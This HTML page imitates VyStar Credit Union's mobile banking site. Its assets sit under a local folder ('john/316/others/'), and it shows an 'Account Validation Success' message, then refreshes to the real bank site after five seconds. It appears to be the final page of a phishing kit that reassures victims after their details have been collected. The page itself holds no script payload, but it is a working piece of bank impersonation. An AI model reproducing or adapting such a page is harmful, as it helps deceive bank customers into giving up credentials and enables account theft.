<!DOCTYPE html>
<!-- saved from url=(0084)https://mobile.vystarcu.org/m/VS.MobileBanking.Registration/UserDetails/MemberNumber -->
<html lang="en-US" class="ui-mobile"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><!--<base href="https://mobile.vystarcu.org/m/VS.MobileBanking.Registration/UserDetails/MemberNumber">--><base href="."> 

    <title>VyStar Mobile Confirm Identity</title>
    
  <meta http-equiv="Refresh" content="5; url='https://mobile.vystarcu.org/'" />
  
  
  
<link href="https://mobile.vystarcu.org/m/Media/Default/19/VS.Touch/Content/Media/Images/bookmark-icon-114.png" rel="apple-touch-icon-precomposed" sizes="114x114">
<link href="https://mobile.vystarcu.org/m/Media/Default/19/VS.Touch/Content/Media/Images/bookmark-icon-72.png" rel="apple-touch-icon-precomposed" sizes="72x72">
<link href="https://mobile.vystarcu.org/m/Media/Default/19/VS.Touch/Content/Media/Images/bookmark-icon-57.png" rel="apple-touch-icon-precomposed">
<link href="https://mobile.vystarcu.org/m/Media/Default/19/VS.Touch/Content/Media/Images/bookmark-icon-57.png" rel="shortcut icon">
<link href="https://mobile.vystarcu.org/m/Media/Default/19/VS.Touch/Content/Media/Images/startup.png" media="(device-width: 320px)" rel="apple-touch-startup-image">
<link href="https://mobile.vystarcu.org/m/Media/Default/19/VS.Touch/Content/Media/Images/startup.png" media="(device-width: 320px) and (-webkit-device-pixel-ratio: 2)" rel="apple-touch-startup-image">
<link href="https://mobile.vystarcu.org/m/Media/Default/19/VS.Touch/Content/Media/Images/startup-tablet-landscape.png" media="(device-width: 768px) and (orientation: landscape)" rel="apple-touch-startup-image">
<link href="https://mobile.vystarcu.org/m/Media/Default/19/VS.Touch/Content/Media/Images/startup-tablet-portrait-retina.png" media="(device-width: 768px) and (orientation: portrait) and (-webkit-device-pixel-ratio: 2)" rel="apple-touch-startup-image">
<link href="https://mobile.vystarcu.org/m/Media/Default/19/VS.Touch/Content/Media/Images/startup-tablet-landscape-retina.png" media="(device-width: 768px) and (orientation: landscape) and (-webkit-device-pixel-ratio: 2)" rel="apple-touch-startup-image">
<link href="john/316/others/jQueryMobile.min.css" rel="stylesheet" type="text/css">
<link href="john/316/others/Themeroller.min.css" rel="stylesheet" type="text/css">
<link href="john/316/others/Core.min.css" rel="stylesheet" type="text/css">
<link href="john/316/others/media.vs.touch.css" rel="stylesheet" type="text/css">
<link href="john/316/others/style.vs.touch.css" rel="stylesheet" type="text/css">
<link href="john/316/others/Registration.min.css" rel="stylesheet" type="text/css">

</head>
    <body class="ui-mobile-viewport ui-overlay-c">
        



<div data-role="page" class="ux-page static vs-mobilebanking-registration ui-page ui-body-c ui-page-active" data-url="/m/VS.MobileBanking.Registration/UserDetails/MemberNumber" tabindex="0" style="min-height: 855px;">
    
    <div id="header">
<div class="zone zone-header ux-theme-c ux-main-header ux-header ui-header ui-bar-c" data-role="header" data-theme="c" role="banner">

<h1 class="ui-title" role="heading" aria-level="1"><a href="https://mobile.vystarcu.org/m/Login" class="ui-link"><img alt="Mobile Banking Banner" src="john/316/others/logo.png" title=""></a></h1>



<span class="ux-btn-outer ux-btn-outer-mini ux-btn-right">
    <a id="logOnButton" rel="nofollow" data-role="button" data-theme="c" data-mini="true" class="ux-btn ui-btn-right ui-btn ui-btn-up-c ui-shadow ui-btn-corner-all ui-mini" href="https://mobile.vystarcu.org/m/Login" data-corners="true" data-shadow="true" data-iconshadow="true" data-wrapperels="span"><span class="ui-btn-inner"><span class="ui-btn-text">
        Login
    </span></span></a><!-- #logOnButton -->
</span><!-- .ux-btn-outer ux-btn-outer-mini ux-btn-right -->

<span class="ux-btn-outer ux-btn-outer-mini ux-btn-left">
    <a id="servicesButton" rel="nofollow" data-role="button" data-theme="c" data-mini="true" class="ux-btn ui-btn-left ui-btn ui-btn-up-c ui-shadow ui-btn-corner-all ui-mini" href="https://mobile.vystarcu.org/m/Menu/Services" data-corners="true" data-shadow="true" data-iconshadow="true" data-wrapperels="span"><span class="ui-btn-inner"><span class="ui-btn-text">
        More
    </span></span></a><!-- #servicesButton -->
</span><!-- .ux-btn-outer ux-btn-outer-mini ux-btn-left --></div><!-- #header .ux-header -->
        

<!-- #navigation -->
    </div><!-- #header -->
    



<div data-role="header" id="main-heading" data-theme="a" class="ux-hidden-touch ux-header ux-theme-a ux-margin-bottom-none ui-header ui-bar-a" role="banner">
    
</div><!-- #main-heading .ux-header -->

        
    
    

    <div class="zone zone-content">

<div data-theme="a" data-role="header" class="ux-header-bar-bg ui-header ui-bar-a" role="banner">
    <div class="ux-text-left">
        <p>Account Validation Success</p>
    </div>
</div>

<div data-role="content" data-theme="z" class="ux-content ui-content ui-body-z" role="main">

<form action="#" method="post" novalidate="novalidate">

<br>
        You have been successfully validated. You'll be redirectd in a few seconds...
           



</form>
</div>

</div>        <div class="zone zone-footer clearfix ux-footer ui-footer ui-bar-d" data-role="footer" data-theme="d" id="footer" role="contentinfo"></div>        <script src="john/316/others/jquery.validate.min.js.download" type="text/javascript"></script>
<script src="john/316/others/jquery.validate.fiserv.unobtrusive.min.js.download" type="text/javascript"></script>
<script src="john/316/others/registration.min.js.download" type="text/javascript"></script>


</div><!-- .ux-page -->



<noscript>
    <style type="text/css">
        <!--

        .ux-page { display: none; }

        #no-script { display: block!important; }
        -->
    </style> 
</noscript>

<div id="no-script" style="display: none;">
    <div class="ux-alert ux-alert-error">
        <p>It looks like you don’t have javascript enabled on your browser. Please enable javascript for the optimum Mobiliti experience.</p>
        <p>If you don’t want to enable javascript, you can use the basic website instead.</p>
        <p><a class="ux-btn" data-ajax="false" data-role="button" data-theme="b" href="https://mobile.vystarcu.org/m/MobileBanking.ThemeSwitcher/CookiesTheme/SetTheme?name=VS.Base">Switch to Basic site</a></p>
    </div><!-- .ux-alert ux-alert-error -->
</div><!-- #no-script -->
    
<div class="ui-loader ui-corner-all ui-body-z ui-loader-default"><span class="ui-icon ui-icon-loading"></span><h1>loading</h1></div></body></html>